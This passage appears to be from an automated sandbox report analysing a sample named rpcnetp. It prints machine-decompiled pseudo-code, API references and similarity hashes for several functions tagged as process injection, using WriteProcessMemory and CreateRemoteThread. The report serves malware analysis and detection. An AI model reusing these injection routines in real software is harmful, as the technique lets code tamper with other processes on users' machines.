					_v8 = _v8 - 1;
					_t31 = _v8 - 1;
					_v12 = 0;
					if(_t31 == 0) {
						break;
					}
					if(_t31 != 1) {
						L12:
						E00A12D40( &_v144);
						return PostMessageA( *0xa1600c, 0x400, 1, 2);
					}
					_t54 = _a4;
					_t8 =  *_a4 + 6; // 0x4
					_t53 = _t8;
					if( *0xa160ce != 0) {
						_t53 = 0xa160ce;
					}
					if(E00A12D7F( &_v144, _t53, _t45 + 2,  *((intOrPtr*)(_t54 + 4))) > 0) {
						if(PeekMessageA( &_v172, 0, 0x12, 0x12, 0) == 0) {
							continue;
						}
					}
					goto L12;
				}
				_t56 = LocalAlloc(0x40, 0x4464);
				if(_t56 != 0) {
					 *(_t56 + 0x70) =  *(_t56 + 0x70) | 0xffffffff;
					 *(_t56 + 0x5c) =  *(_t56 + 0x5c) | 0x00000004;
					 *((intOrPtr*)(_t56 + 0x3ba8)) = GetCurrentThreadId();
					_t18 = _t56 + 0x3c58; // 0x3c58
					E00A14D14(_t18,  &_v144, 0x80);
					 *((intOrPtr*)(_t56 + 0x6c)) = 3;
					_t42 = CreateThread(0, 0, E00A11C2C, _t56, 0,  &_v16);
					 *(_t56 + 0x3ba4) = _t42;
					if(_t42 != 0) {
						_v92 = 0;
						_v12 = 1;
						SetThreadPriority( *(_t56 + 0x3ba4), 0xfffffff1);
					}
				}
				E00A11F30(_t56, _v12);
				if(_v12 != 0) {
					goto L1;
				} else {
					goto L12;
				}
			}

0x00a13015
0x00a1301a
0x00a13021
0x00a13021
0x00a13021
0x00a13027
0x00a13028
0x00a1302b
0x00000000
0x00000000
0x00a1302e
0x00a1310a
0x00a13111
0x00a1312f
0x00a1312f
0x00a13034
0x00a13039
0x00a13039
0x00a13042
0x00a13044
0x00a13044
0x00a1305f
0x00a1307a
0x00000000
0x00000000
0x00a1307c
0x00000000
0x00a1305f
0x00a1308e
0x00a13092
0x00a13094
0x00a13098
0x00a130a2
0x00a130b0
0x00a130b7
0x00a130c9
0x00a130d0
0x00a130d6
0x00a130de
0x00a130e2
0x00a130eb
0x00a130f2
0x00a130f2
0x00a130de
0x00a130fc
0x00a13104
0x00000000
0x00000000
0x00000000
0x00000000

APIs

PeekMessageA.USER32(?,00000000,00000012,00000012,00000000), ref: 00A13072
LocalAlloc.KERNEL32(00000040,00004464,?,00000000,00000080), ref: 00A13088
GetCurrentThreadId.KERNEL32 ref: 00A1309C
CreateThread.KERNEL32(00000000,00000000,Function_00001C2C,00000000,00000000,?), ref: 00A130D0
SetThreadPriority.KERNEL32(?,000000F1), ref: 00A130F2
PostMessageA.USER32 ref: 00A13125

Memory Dump Source

Source File: 00000006.00000002.937118666.0000000000A11000.00000020.00020000.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000006.00000002.937095794.0000000000A10000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.937179586.0000000000A17000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.937221221.0000000000A18000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_a10000_rpcnetp.jbxd

Similarity

API ID: Thread$Message$AllocCreateCurrentLocalPeekPostPriority
String ID:
API String ID: 2250156434-0
Opcode ID: d7cbe5c6dad7131069d06c2b4e33eec105a11d0ab6a226dbf8cc942ba869b434
Instruction ID: 1d5784b7827291de9282786491dfc428f6b6a746be1b0c3c5dfc98a212d99876
Opcode Fuzzy Hash: d7cbe5c6dad7131069d06c2b4e33eec105a11d0ab6a226dbf8cc942ba869b434
Instruction Fuzzy Hash: 0831AA72900608BFDF21DFA5DC49FDABBBCEB48700F10825AF655E6181D7749A85CB20

Uniqueness

Uniqueness Score: -1.00%

Function 72B21C7B, Relevance: 9.1, APIs: 6, Instructions: 52
memorythreadinjectionCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E72B21C7B() {
				void* _t40;
				long _t41;
				void* _t42;
				void* _t43;
				void* _t44;
				void* _t45;
				void* _t46;
				void* _t47;
				void* _t48;

				_push(0x10);
				_push(0x72b25398);
				E72B24A94(_t40, _t44, _t46);
				 *(_t48 - 0x1c) = LocalAlloc(0x40, 0x4464);
				_t45 = GetStdHandle(0xfffffff4);
				 *(_t48 - 4) =  *(_t48 - 4) & 0x00000000;
				if( *(_t48 - 0x1c) != 0) {
					_push(_t48 - 0x20);
					_t41 = 4;
					_t47 =  *(_t48 + 8);
					if(WriteProcessMemory(_t45, _t47 + 0x84, _t48 - 0x1c, _t41, ??) != 0 && ReadProcessMemory(_t45, _t47,  *(_t48 - 0x1c), 0x78, _t48 - 0x20) != 0) {
						 *( *(_t48 - 0x1c) + 0x6c) = _t41;
						 *( *(_t48 - 0x1c) + 0x70) =  *( *(_t48 - 0x1c) + 0x70) | 0xffffffff;
						 *( *(_t48 - 0x1c) + 0x370c) =  *( *(_t48 - 0x1c) + 0x370c) | _t41;
						 *( *(_t48 - 0x1c) + 0x1bd4) = _t47;
						E72B21F95(_t41, _t42, _t43, _t45, _t47,  *( *(_t48 - 0x1c) + 0x370c),  *(_t48 - 0x1c));
					}
					LocalFree( *(_t48 - 0x1c));
				}
				 *(_t48 - 4) =  *(_t48 - 4) | 0xffffffff;
				ExitThread(0);
			}

0x72b21c7b
0x72b21c7d
0x72b21c82
0x72b21c94
0x72b21c9f
0x72b21ca1
0x72b21ca9
0x72b21cae
0x72b21cb1
0x72b21cb7
0x72b21cca
0x72b21ce4
0x72b21cea
0x72b21cf1
0x72b21cfa
0x72b21d03
0x72b21d03
0x72b21d0b
0x72b21d0b
0x72b21d1a
0x72b21d20

APIs

LocalAlloc.KERNEL32(00000040,00004464,72B25398,00000010), ref: 72B21C8E
GetStdHandle.KERNEL32(000000F4), ref: 72B21C99
WriteProcessMemory.KERNEL32(00000000,?,00000000,00000004,?), ref: 72B21CC2
ReadProcessMemory.KERNEL32(00000000,?,00000000,00000078,?), ref: 72B21CD7

Part of subcall function 72B21F95: GetStdHandle.KERNEL32(000000F4,72B253A8,000006C0,72B21C37,?), ref: 72B21FB7
Part of subcall function 72B21F95: GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,?,?,?,?,0000032E,?,00000000,0000032E), ref: 72B22033
Part of subcall function 72B21F95: CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,?,00000004,?), ref: 72B2205F
Part of subcall function 72B21F95: ResumeThread.KERNEL32(?), ref: 72B220C1
Part of subcall function 72B21F95: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 72B220D0
Part of subcall function 72B21F95: CloseHandle.KERNEL32(?), ref: 72B220D9

LocalFree.KERNEL32(00000000), ref: 72B21D0B
ExitThread.KERNEL32 ref: 72B21D20

Memory Dump Source

Source File: 00000006.00000002.938126535.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true

Associated: 00000006.00000002.938088725.0000000072B20000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.938169246.0000000072B27000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.938191585.0000000072B28000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_72b20000_rpcnetp.jbxd

Similarity

API ID: Handle$Thread$LocalMemoryProcess$AllocCloseCreateExitFreeMultipleObjectsReadRemoteResumeWaitWrite
String ID:
API String ID: 3187294079-0
Opcode ID: eb10873bd4b33ee44731de4874c76e1266a4d0df7197caff664842dd91625b3e
Instruction ID: c86dc8486e0665793866c7a9820250b529532658d765509b66e6b22a8b28303e
Opcode Fuzzy Hash: eb10873bd4b33ee44731de4874c76e1266a4d0df7197caff664842dd91625b3e
Instruction Fuzzy Hash: 52113A7295034AEFDB118FA5CC48FEE7BF8EB44361F158229E529B7192D7389501CB20

Uniqueness

Uniqueness Score: -1.00%

Function 00A11C7B, Relevance: 9.1, APIs: 6, Instructions: 52
memorythreadinjectionCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00A11C7B() {
				void* _t40;
				long _t41;
				void* _t42;
				void* _t43;
				void* _t44;
				void* _t45;
				void* _t46;
				void* _t47;

				_push(0x10);
				_push(0xa15398);
				E00A14A94(_t40, _t43, _t45);
				 *(_t47 - 0x1c) = LocalAlloc(0x40, 0x4464);
				_t44 = GetStdHandle(0xfffffff4);
				 *(_t47 - 4) =  *(_t47 - 4) & 0x00000000;
				if( *(_t47 - 0x1c) != 0) {
					_push(_t47 - 0x20);
					_t41 = 4;
					_t46 =  *(_t47 + 8);
					if(WriteProcessMemory(_t44, _t46 + 0x84, _t47 - 0x1c, _t41, ??) != 0 && ReadProcessMemory(_t44, _t46,  *(_t47 - 0x1c), 0x78, _t47 - 0x20) != 0) {
						 *( *(_t47 - 0x1c) + 0x6c) = _t41;
						 *( *(_t47 - 0x1c) + 0x70) =  *( *(_t47 - 0x1c) + 0x70) | 0xffffffff;
						 *( *(_t47 - 0x1c) + 0x370c) =  *( *(_t47 - 0x1c) + 0x370c) | _t41;
						 *( *(_t47 - 0x1c) + 0x1bd4) = _t46;
						E00A11F95(_t41, _t42, _t44, _t46,  *( *(_t47 - 0x1c) + 0x370c),  *(_t47 - 0x1c));
					}
					LocalFree( *(_t47 - 0x1c));
				}
				 *(_t47 - 4) =  *(_t47 - 4) | 0xffffffff;
				ExitThread(0);
			}

0x00a11c7b
0x00a11c7d
0x00a11c82
0x00a11c94
0x00a11c9f
0x00a11ca1
0x00a11ca9
0x00a11cae
0x00a11cb1
0x00a11cb7
0x00a11cca
0x00a11ce4
0x00a11cea
0x00a11cf1
0x00a11cfa
0x00a11d03
0x00a11d03
0x00a11d0b
0x00a11d0b
0x00a11d1a
0x00a11d20

APIs

LocalAlloc.KERNEL32(00000040,00004464,00A15398,00000010), ref: 00A11C8E
GetStdHandle.KERNEL32(000000F4), ref: 00A11C99
WriteProcessMemory.KERNEL32(00000000,?,00000000,00000004,?), ref: 00A11CC2
ReadProcessMemory.KERNEL32(00000000,?,00000000,00000078,?), ref: 00A11CD7

Part of subcall function 00A11F95: GetStdHandle.KERNEL32(000000F4,00A153A8,000006C0,00A11C37,?), ref: 00A11FB7
Part of subcall function 00A11F95: GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,?,?,?,?,0000032E,?,00000000,0000032E), ref: 00A12033
Part of subcall function 00A11F95: CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,?,00000004,?), ref: 00A1205F
Part of subcall function 00A11F95: ResumeThread.KERNEL32(?), ref: 00A120C1
Part of subcall function 00A11F95: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00A120D0
Part of subcall function 00A11F95: CloseHandle.KERNEL32(?), ref: 00A120D9

LocalFree.KERNEL32(00000000), ref: 00A11D0B
ExitThread.KERNEL32 ref: 00A11D20

Memory Dump Source

Source File: 00000006.00000002.937118666.0000000000A11000.00000020.00020000.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000006.00000002.937095794.0000000000A10000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.937179586.0000000000A17000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.937221221.0000000000A18000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_a10000_rpcnetp.jbxd

Similarity

API ID: Handle$Thread$LocalMemoryProcess$AllocCloseCreateExitFreeMultipleObjectsReadRemoteResumeWaitWrite
String ID:
API String ID: 3187294079-0
Opcode ID: a37cf31ac386f91ef938f27a3bc639ef983b3d1810c9d360dab52811b546b64a
Instruction ID: 0d35ea56b8990a247a879ad1b9c30cd8043350959af957f06f2c6be90fb46c1a
Opcode Fuzzy Hash: a37cf31ac386f91ef938f27a3bc639ef983b3d1810c9d360dab52811b546b64a
Instruction Fuzzy Hash: 3E110A71E4024AEFDB10DFA4D849FEE7BB8AB08761F148115F625A61A0D7389982CB11

Uniqueness

Uniqueness Score: -1.00%

Function 72B21775, Relevance: 7.6, APIs: 5, Instructions: 62
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E72B21775(intOrPtr _a4, long _a8, _Unknown_base(*)()* _a12, int _a16) {
				signed char _t21;
				intOrPtr _t25;
				void* _t28;
				void* _t32;
				void* _t40;

				_t40 = _a8;
				_t21 =  *(_t40 + 0x1b44);
				if((_t21 & 0x00000001) == 0) {
					 *(_t40 + 0x1b44) = _t21 | 0x00000001;
					_t25 = _a4;
					 *((intOrPtr*)(_t40 + 0x1b48)) = _t25;
					 *((intOrPtr*)(_t40 + 0x1b14)) =  *((intOrPtr*)(_t25 + 0x70));
					InitializeCriticalSection(_t40 + 0x1b18);
					 *((intOrPtr*)(_t40 + 0x1b40)) = CreateEventA(0, 1, 0, 0);
					_t28 = CreateEventA(0, 1, 0, 0);
					 *(_t40 + 0x1b10) = _t28;
					if( *((intOrPtr*)(_t40 + 0x1b40)) == 0 || _t28 == 0) {
						L6:
						E72B216BA(_t40);
					} else {
						if(_a12 == 0) {
							L5:
							SetThreadPriority( *(_t40 + 0x1b0c), _a16);
						} else {
							_t32 = CreateThread(0, 0, _a12, _t40, 0,  &_a8);
							 *(_t40 + 0x1b0c) = _t32;
							if(_t32 == 0) {
								goto L6;
							} else {
								goto L5;
							}
						}
					}
				}
				return  *(_t40 + 0x1b44) & 1;
			}

0x72b21779
0x72b2177c
0x72b21784
0x72b2178c
0x72b21792
0x72b21799
0x72b217a7
0x72b217ad
0x72b217c7
0x72b217cd
0x72b217cf
0x72b217db
0x72b21812
0x72b21813
0x72b217e1
0x72b217e4
0x72b21801
0x72b2180a
0x72b217e6
0x72b217f1
0x72b217f7
0x72b217ff
0x00000000
0x00000000
0x00000000
0x00000000
0x72b217ff
0x72b217e4
0x72b21819
0x72b21826

APIs

InitializeCriticalSection.KERNEL32(?), ref: 72B217AD
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 72B217C0
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 72B217CD
CreateThread.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 72B217F1
SetThreadPriority.KERNEL32(?,?), ref: 72B2180A

Memory Dump Source

Source File: 00000006.00000002.938126535.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true

Associated: 00000006.00000002.938088725.0000000072B20000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.938169246.0000000072B27000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.938191585.0000000072B28000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_72b20000_rpcnetp.jbxd

Similarity

API ID: Create$EventThread$CriticalInitializePrioritySection
String ID:
API String ID: 2454249074-0
Opcode ID: 215d35c185ac9572e93c9689a794df72fea7adc102145aefd910f693528aebe6
Instruction ID: 2b7b849261d314237348428b04d03b57a499ce12b49900591cbacb009e5b40d1
Opcode Fuzzy Hash: 215d35c185ac9572e93c9689a794df72fea7adc102145aefd910f693528aebe6
Instruction Fuzzy Hash: 41117C32110784AFC7319F2ACC84EE7BBF9FBC9751B14891EF96A86102E331A440DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00A11775, Relevance: 7.6, APIs: 5, Instructions: 62
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A11775(intOrPtr _a4, long _a8, _Unknown_base(*)()* _a12, int _a16) {
				signed char _t21;
				intOrPtr _t25;
				void* _t28;
				void* _t32;
				void* _t40;

				_t40 = _a8;
				_t21 =  *(_t40 + 0x1b44);
				if((_t21 & 0x00000001) == 0) {
					 *(_t40 + 0x1b44) = _t21 | 0x00000001;
					_t25 = _a4;
					 *((intOrPtr*)(_t40 + 0x1b48)) = _t25;
					 *((intOrPtr*)(_t40 + 0x1b14)) =  *((intOrPtr*)(_t25 + 0x70));
					InitializeCriticalSection(_t40 + 0x1b18);
					 *((intOrPtr*)(_t40 + 0x1b40)) = CreateEventA(0, 1, 0, 0);
					_t28 = CreateEventA(0, 1, 0, 0);
					 *(_t40 + 0x1b10) = _t28;
					if( *((intOrPtr*)(_t40 + 0x1b40)) == 0 || _t28 == 0) {
						L6:
						E00A116BA(_t40);
					} else {
						if(_a12 == 0) {
							L5:
							SetThreadPriority( *(_t40 + 0x1b0c), _a16);
						} else {
							_t32 = CreateThread(0, 0, _a12, _t40, 0,  &_a8);
							 *(_t40 + 0x1b0c) = _t32;
							if(_t32 == 0) {
								goto L6;
							} else {
								goto L5;
							}
						}
					}
				}
				return  *(_t40 + 0x1b44) & 1;
			}

0x00a11779
0x00a1177c
0x00a11784
0x00a1178c
0x00a11792
0x00a11799
0x00a117a7
0x00a117ad
0x00a117c7
0x00a117cd
0x00a117cf
0x00a117db
0x00a11812
0x00a11813
0x00a117e1
0x00a117e4
0x00a11801
0x00a1180a
0x00a117e6
0x00a117f1
0x00a117f7
0x00a117ff
0x00000000
0x00000000
0x00000000
0x00000000
0x00a117ff
0x00a117e4
0x00a11819
0x00a11826

APIs

InitializeCriticalSection.KERNEL32(?), ref: 00A117AD
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00A117C0
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00A117CD
CreateThread.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 00A117F1
SetThreadPriority.KERNEL32(?,?), ref: 00A1180A

Memory Dump Source

Source File: 00000006.00000002.937118666.0000000000A11000.00000020.00020000.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000006.00000002.937095794.0000000000A10000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.937179586.0000000000A17000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.937221221.0000000000A18000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_a10000_rpcnetp.jbxd

Similarity

API ID: Create$EventThread$CriticalInitializePrioritySection
String ID:
API String ID: 2454249074-0
Opcode ID: 374e420e052abf54fab628d5c8f3aae0946750b395cf08600343ccbb62c642bc
Instruction ID: d1c4f3c571ecc49952daf0508d9f171a0efcf99069b6d132ea9533ac55a8680b
Opcode Fuzzy Hash: 374e420e052abf54fab628d5c8f3aae0946750b395cf08600343ccbb62c642bc
Instruction Fuzzy Hash: 58116036500784AFCB319F659C44DE7BBF9FB89711B14891EFAA982101E331A981DB60

Uniqueness

Uniqueness Score: -1.00%

Function 72B224BC, Relevance: 7.6, APIs: 5, Instructions: 54
threadinjectionCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E72B224BC(void* __ecx, void* _a4, _Unknown_base(*)()* _a8, void* _a12, intOrPtr _a16, DWORD* _a20, intOrPtr _a24) {
				intOrPtr _v8;
				int _v12;
				void* _t14;
				int _t15;
				DWORD* _t20;
				intOrPtr _t24;

				_t20 = _a20;
				_t24 = _a16;
				_v12 = 0;
				_v8 = _t24;
				 *_t20 = 0;
				_t14 = CreateRemoteThread(_a4, 0, 0, _a8, _a12, 0, 0);
				_v12 = _t14;
				if(_t14 == 0) {
					_t15 = TerminateProcess(_a4, 0);
				} else {
					if(_a24 != 0) {
						_push(0xffffffff);
						_push(0);
						_push( &_v12);
						if(_t24 == 0) {
							_push(1);
						} else {
							_push(2);
						}
						if(WaitForMultipleObjects() == 0) {
							GetExitCodeThread(_v12, _t20);
						}
					} else {
						 *_t20 = 1;
					}
					_t15 = CloseHandle(_v12);
				}
				return _t15;
			}

0x72b224c2
0x72b224c7
0x72b224d1
0x72b224d7
0x72b224df
0x72b224e1
0x72b224e7
0x72b224ec
0x72b2252f
0x72b224ee
0x72b224f1
0x72b224fb
0x72b22500
0x72b22501
0x72b22504
0x72b2250a
0x72b22506
0x72b22506
0x72b22506
0x72b22514
0x72b2251a
0x72b2251a
0x72b224f3
0x72b224f3
0x72b224f3
0x72b22523
0x72b22523
0x72b22539

APIs

CreateRemoteThread.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000), ref: 72B224E1
WaitForMultipleObjects.KERNEL32(00000001,?,00000000,000000FF,?,?,?,72B22C92,?,?,00000000,00000000,00000000,00000000), ref: 72B2250C
GetExitCodeThread.KERNEL32(?,?,?,?,?,72B22C92,?,?,00000000,00000000,00000000,00000000), ref: 72B2251A
CloseHandle.KERNEL32(?,?,?,?,72B22C92,?,?,00000000,00000000,00000000,00000000), ref: 72B22523
TerminateProcess.KERNEL32(?,00000000,?,?,?,72B22C92,?,?,00000000,00000000,00000000,00000000), ref: 72B2252F

Memory Dump Source

Source File: 00000006.00000002.938126535.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true

Associated: 00000006.00000002.938088725.0000000072B20000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.938169246.0000000072B27000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.938191585.0000000072B28000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_72b20000_rpcnetp.jbxd

Similarity

API ID: Thread$CloseCodeCreateExitHandleMultipleObjectsProcessRemoteTerminateWait
String ID:
API String ID: 1317926807-0
Opcode ID: ad490c33ec95803bfa012c41048570bec1150f9c707f8b142208b7c855e28eec
Instruction ID: 43fb7a0f769fbdbb6116ecc8b05a183b5ca6aff15e3d6e9499a38349c8af174b
Opcode Fuzzy Hash: ad490c33ec95803bfa012c41048570bec1150f9c707f8b142208b7c855e28eec
Instruction Fuzzy Hash: E6113971401228BFCB225F56CC58ECF7FB9EF497A2F118505F50AA6152D3309651CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 72B2253C, Relevance: 7.5, APIs: 5, Instructions: 36
threadsynchronizationinjectionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E72B2253C(void* __ecx, void* __eflags, void* _a4) {
				long _v8;
				long _v12;
				void* _t7;
				void* _t19;

				_v8 = _v8 & 0x00000000;
				_t7 = GetStdHandle(0xfffffff4);
				_t19 = CreateRemoteThread(_t7, 0, 0, E72B23223(E72B22314), _a4, 0,  &_v12);
				if(_t19 != 0) {
					WaitForSingleObject(_t19, 0xffffffff);
					GetExitCodeThread(_t19,  &_v8);
					CloseHandle(_t19);
				}
				return _v8;
			}

0x72b22541
0x72b22548
0x72b2256f
0x72b22573
0x72b22578
0x72b22583
0x72b2258a
0x72b2258a
0x72b22595

APIs

GetStdHandle.KERNEL32(000000F4,?,?,?,?,72B227C2,?,?,?,?,?,72B2164B,?,?,?), ref: 72B22548
CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?), ref: 72B22569
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,72B227C2,?,?,?,?,?,72B2164B,?,?,?), ref: 72B22578
GetExitCodeThread.KERNEL32(00000000,00000000,?,?,?,72B227C2,?,?,?,?,?,72B2164B,?,?,?), ref: 72B22583
CloseHandle.KERNEL32(00000000,?,?,?,72B227C2,?,?,?,?,?,72B2164B,?,?,?), ref: 72B2258A

Memory Dump Source

Source File: 00000006.00000002.938126535.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true

Associated: 00000006.00000002.938088725.0000000072B20000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.938169246.0000000072B27000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.938191585.0000000072B28000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_72b20000_rpcnetp.jbxd

Similarity

API ID: HandleThread$CloseCodeCreateExitObjectRemoteSingleWait
String ID:
API String ID: 3128336559-0
Opcode ID: 2b8f83884517cb3ba26775e358e24cda4cd880b66a82d5994a4a5c0914fcdb4e
Instruction ID: 009471020fc4e506f9a1f4f8785b6e6bc51251f61989519d315005196ebec4ca
Opcode Fuzzy Hash: 2b8f83884517cb3ba26775e358e24cda4cd880b66a82d5994a4a5c0914fcdb4e
Instruction Fuzzy Hash: 9CF09077450344BFDB118795CC49FAF36F8DB857A1F310618F615A31C2DB74A5019725

Uniqueness

Uniqueness Score: -1.00%

Function 00A1253C, Relevance: 7.5, APIs: 5, Instructions: 36
threadsynchronizationinjectionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A1253C(void* __ecx, void* __eflags, void* _a4) {
				long _v8;
				long _v12;
				void* _t7;
				void* _t19;

				_v8 = _v8 & 0x00000000;
				_t7 = GetStdHandle(0xfffffff4);
				_t19 = CreateRemoteThread(_t7, 0, 0, E00A13223(E00A12314), _a4, 0,  &_v12);
				if(_t19 != 0) {
					WaitForSingleObject(_t19, 0xffffffff);
					GetExitCodeThread(_t19,  &_v8);
					CloseHandle(_t19);
				}
				return _v8;
			}

0x00a12541
0x00a12548
0x00a1256f
0x00a12573
0x00a12578
0x00a12583
0x00a1258a
0x00a1258a
0x00a12595

APIs

GetStdHandle.KERNEL32(000000F4,?,?,?,?,00A127C2,?,?,?,?,?,00A1164B,?,?,?), ref: 00A12548
CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?), ref: 00A12569
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,00A127C2,?,?,?,?,?,00A1164B,?,?,?), ref: 00A12578
GetExitCodeThread.KERNEL32(00000000,00000000,?,?,?,00A127C2,?,?,?,?,?,00A1164B,?,?,?), ref: 00A12583
CloseHandle.KERNEL32(00000000,?,?,?,00A127C2,?,?,?,?,?,00A1164B,?,?,?), ref: 00A1258A

Memory Dump Source

Source File: 00000006.00000002.937118666.0000000000A11000.00000020.00020000.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000006.00000002.937095794.0000000000A10000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.937179586.0000000000A17000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.937221221.0000000000A18000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_a10000_rpcnetp.jbxd

Similarity

API ID: HandleThread$CloseCodeCreateExitObjectRemoteSingleWait
String ID:
API String ID: 3128336559-0
Opcode ID: c870207994f9fbf493ff01a369ddb4283b75751882f5e47db17335e0c142e287
Instruction ID: b1093ab7c5c6a0f5073837ebc1c413455d88f623481f241cd39408b05255f513
Opcode Fuzzy Hash: c870207994f9fbf493ff01a369ddb4283b75751882f5e47db17335e0c142e287
Instruction Fuzzy Hash: 92F0B436900104BFDB00DBD4DC49FFE367CEB89721F204204F711921D0DB78AA829724

Uniqueness

Uniqueness Score: -1.00%

Function 72B229E4, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 78
stringCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E72B229E4(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t53;
				signed int _t58;
				void* _t61;
				intOrPtr _t63;
				intOrPtr _t65;
				void* _t66;

				_t61 = __edx;
				_push(0x40);
				_push(0x72b253e8);
				E72B24A94(__ebx, __edi, __esi);
				_t65 =  *((intOrPtr*)(_t66 + 8));
				_t58 = 0;
				 *((intOrPtr*)(_t66 - 0x20)) = 0;
				_t63 = 0;
				 *(_t66 - 4) = 0;
				while(1) {
					_push(_t58);
					_push(_t58);
					_push(_t66 - 0x24);
					_push( *((intOrPtr*)(_t65 + 0x3c60)));
					if( *((intOrPtr*)(_t65 + 0x3c80))() == 0 ||  *((intOrPtr*)(_t66 - 0x24)) == _t58) {
						break;
					}
					_t53 =  *((intOrPtr*)(_t66 + 0x10)) - _t63;
					if(_t53 >  *((intOrPtr*)(_t66 - 0x24))) {
						_t53 =  *((intOrPtr*)(_t66 - 0x24));
					}
					_push(_t66 - 0x1c);
					_push(_t53);
					_push( *((intOrPtr*)(_t66 + 0xc)) + _t63);
					_push( *((intOrPtr*)(_t65 + 0x3c60)));
					if( *((intOrPtr*)(_t65 + 0x3c84))() != 0 &&  *((intOrPtr*)(_t66 - 0x1c)) != _t58) {
						_t63 = _t63 +  *((intOrPtr*)(_t66 - 0x1c));
						 *((intOrPtr*)(_t66 - 0x28)) = _t63;
						continue;
					}
					break;
				}
				 *((intOrPtr*)( *((intOrPtr*)(_t66 + 0x14)))) = _t63;
				if(_t63 != _t58) {
					lstrcpyA(_t66 - 0x50, "TagId");
					 *((intOrPtr*)(_t66 - 0x1c)) = 0x28;
					_push(0);
					_push(_t66 - 0x1c);
					_push(_t66 - 0x50);
					_push(0xffff);
					_push( *((intOrPtr*)(_t65 + 0x3c60)));
					if( *((intOrPtr*)(_t65 + 0x3c88))() != 0) {
						lstrcpyA(_t65 + 0x3cb0, _t66 - 0x50);
					}
					 *((intOrPtr*)(_t66 - 0x20)) = E72B22F96( *((intOrPtr*)(_t66 + 0xc)), _t63);
					_t58 = 0;
				}
				 *(_t66 - 4) =  *(_t66 - 4) | 0xffffffff;
				if( *((intOrPtr*)(_t66 - 0x20)) == _t58) {
					 *(_t65 + 0x5c) =  *(_t65 + 0x5c) & 0x000000fb;
					 *((intOrPtr*)( *((intOrPtr*)(_t66 + 0x14)))) = _t58;
				}
				return E72B2159C( *((intOrPtr*)(_t66 - 0x20)), _t61);
			}

0x72b229e4
0x72b229e4
0x72b229e6
0x72b229eb
0x72b229f0
0x72b229f3
0x72b229f5
0x72b229f8
0x72b229fa
0x72b229fd
0x72b229fd
0x72b229fe
0x72b22a02
0x72b22a03
0x72b22a11
0x00000000
0x00000000
0x72b22a1b
0x72b22a20
0x72b22a22
0x72b22a22
0x72b22a28
0x72b22a29
0x72b22a2f
0x72b22a30
0x72b22a3e
0x72b22a45
0x72b22a48
0x00000000
0x72b22a48
0x00000000
0x72b22a3e
0x72b22a50
0x72b22a54
0x72b22a65
0x72b22a67
0x72b22a6e
0x72b22a73
0x72b22a77
0x72b22a78
0x72b22a7d
0x72b22a8b
0x72b22a98
0x72b22a98
0x72b22aa3
0x72b22aa6
0x72b22aa6
0x72b22aa8
0x72b22ac5
0x72b22ac7
0x72b22ace
0x72b22ace
0x72b22ad8

APIs

